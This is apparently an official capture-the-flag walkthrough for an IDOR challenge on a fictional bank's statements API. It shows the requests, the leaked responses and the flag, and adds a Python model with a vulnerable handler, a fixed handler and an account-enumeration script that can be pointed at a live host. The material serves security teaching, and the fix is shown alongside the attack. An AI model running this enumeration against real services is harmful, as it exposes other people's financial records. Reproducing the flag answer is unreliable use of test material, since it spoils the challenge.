HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Account Statements — FirstBank

IDOR & Access Control · Insecure Direct Object Reference (IDOR)
Difficulty: Easy
Vuln class: Insecure Direct Object Reference (IDOR)
Steps: 3
// Objective
Access account statements belonging to other FirstBank customers by manipulating the account number in the request.
// Tools required
Browser, Developer Tools, Burp Suite
// Step-by-step walkthrough
1. Log in and view your own statements
Log in with the provided test credentials. Navigate to Statements. Observe the URL or the API request used to load your statements.
Command / Input
GET /api/statements?account=20001
Authorization: Bearer <your_token>
Output
{"account":"20001","owner":"Test User","transactions":[...]}
2. Test IDOR by changing the account number
Change the account number in the request to a different value, keeping your own bearer token. The server should check that the requested account belongs to the authenticated user, but it does not.
Command / Input
GET /api/statements?account=20002
Authorization: Bearer <your_token>
Output
{"account":"20002","owner":"Alice Thompson","transactions":[...]}
The server returned another customer's statements using your valid token. The only check was authentication (are you logged in?) — not authorisation (does this account belong to you?).
3. Find the flag account
Iterate through account numbers with the same request (Burp Intruder or a short script) until a response contains the flag. Try accounts near your own, or well-known numbers like 10000 or 99999.
Command / Input
GET /api/statements?account=10001
Authorization: Bearer <your_token>
Output
{"account":"10001","owner":"Admin","flag":"HackrGG{f1rstb4nk_1d0r_4cc0unt_st4t3m3nt}"}
In a real attack this exposes full transaction history, balances, and personal data for every customer on the platform.
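The three steps above, modelled as runnable Python. This is an added example, not code from the hackr.gg walkthrough or from FirstBank: the tokens, the in-memory account store and the helper names (statements_vulnerable, statements_fixed, enumerate_idor, http_fetch) are constructed for illustration; only the three account numbers, owners and the flag value come from the page. It shows the authentication-only handler the challenge exhibits, the ownership check that fixes it, and the step-3 enumeration as a script that works against either handler.

```python
"""IDOR on /api/statements, modelled offline.

Added example, not part of the hackr.gg walkthrough. Tokens, the
in-memory store and all helper names are constructed; the account
numbers 20001/20002/10001, their owners and the flag are from the page.
"""
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Optional
import json
import urllib.error
import urllib.request

# Constructed: bearer token -> account that token owns.
TOKENS = {
    "tok-testuser": "20001",   # the walkthrough's provided test credentials
    "tok-alice": "20002",
}

# Constructed statement store; the three records mirror the page's responses.
STATEMENTS = {
    "20001": {"account": "20001", "owner": "Test User",
              "transactions": [{"amount": -12.50}]},
    "20002": {"account": "20002", "owner": "Alice Thompson",
              "transactions": [{"amount": 250.00}]},
    "10001": {"account": "10001", "owner": "Admin",
              "flag": "HackrGG{f1rstb4nk_1d0r_4cc0unt_st4t3m3nt}"},
}


@dataclass
class Response:
    status: int
    body: dict


def _authenticate(auth_header: Optional[str]) -> Optional[str]:
    """Return the account owned by the bearer token, or None if not logged in."""
    if not auth_header or not auth_header.startswith("Bearer "):
        return None
    return TOKENS.get(auth_header[len("Bearer "):])


def statements_vulnerable(account: str, auth_header: Optional[str]) -> Response:
    """Models FirstBank's handler: only asks 'is the caller logged in?'."""
    if _authenticate(auth_header) is None:
        return Response(401, {"error": "unauthenticated"})
    record = STATEMENTS.get(account)
    if record is None:
        return Response(404, {"error": "no such account"})
    return Response(200, record)          # no check that the account is the caller's


def statements_fixed(account: str, auth_header: Optional[str]) -> Response:
    """Hardened handler: same lookup, plus 'does this account belong to the caller?'."""
    owner_account = _authenticate(auth_header)
    if owner_account is None:
        return Response(401, {"error": "unauthenticated"})
    if account != owner_account:
        # Authorisation failure is decided before the lookup, so the response
        # does not reveal whether the requested account number exists.
        return Response(403, {"error": "forbidden"})
    record = STATEMENTS.get(account)
    if record is None:
        return Response(404, {"error": "no such account"})
    return Response(200, record)


Fetcher = Callable[[str, str], Response]


def enumerate_idor(fetch: Fetcher, token: str, my_account: str,
                   candidates: Iterable[str]) -> Dict[str, dict]:
    """Step 3 as a script: request each candidate with your own token and keep
    every 200 whose data is not yours. Returns {account: body}."""
    leaked: Dict[str, dict] = {}
    for acct in candidates:
        resp = fetch(acct, f"Bearer {token}")
        if resp.status == 200 and resp.body.get("account") != my_account:
            leaked[acct] = resp.body
    return leaked


def http_fetch(base_url: str) -> Fetcher:
    """Real transport for the same enumerator (stdlib urllib); not exercised offline."""
    def fetch(account: str, auth_header: str) -> Response:
        req = urllib.request.Request(f"{base_url}/api/statements?account={account}",
                                     headers={"Authorization": auth_header})
        try:
            with urllib.request.urlopen(req, timeout=10) as r:
                return Response(r.status, json.loads(r.read()))
        except urllib.error.HTTPError as e:
            return Response(e.code, {})
    return fetch


if __name__ == "__main__":
    candidates = [str(n) for n in range(10000, 10010)] + \
                 [str(n) for n in range(20000, 20010)]
    for name, handler in (("vulnerable", statements_vulnerable),
                          ("fixed", statements_fixed)):
        found = enumerate_idor(handler, "tok-testuser", "20001", candidates)
        print(name, {a: b.get("owner") for a, b in found.items()})
        for acct, body in found.items():
            if "flag" in body:
                print("  flag in", acct, body["flag"])
```

Against the vulnerable handler the enumerator returns Alice's account and the Admin account carrying the flag; against the fixed handler it returns nothing, because every foreign account number is refused with 403 before lookup. To run the same enumeration against a live target, pass `http_fetch("https://<host>")` in place of the handler.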
// Flag
Flag value
HackrGG{f1rstb4nk_1d0r_4cc0unt_st4t3m3nt}
Found in account #10001 statements using your own authenticated session.